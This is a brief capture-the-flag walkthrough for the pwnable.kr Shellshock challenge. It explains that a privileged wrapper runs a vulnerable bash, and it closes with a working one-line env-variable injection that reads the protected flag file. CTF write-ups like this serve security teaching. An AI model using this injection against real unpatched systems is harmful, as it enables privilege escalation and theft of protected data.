10 - Shellshock

The Challenge

Mommy, there was a shocking news about bash. I bet you already know, but lets just make it sure :)

ssh shellshock@pwnable.kr -p2222 (pw:guest)

The Solution

Let's look at the files.

What is the purpose of this bash binary?

The binary is running with shellshock_pwns privileges. What is it doing?

It runs the bash binry with shellshock_pwns privileges. what's so special about that bash? As the name of the challenge suggests, this bash is vulnerable to shellshock.

Here is the solution for ya'll:

env x='() { :;}; /bin/cat flag' ./shellshock

Previous09 - mistake Next11 - coin1

Last updated 3 years ago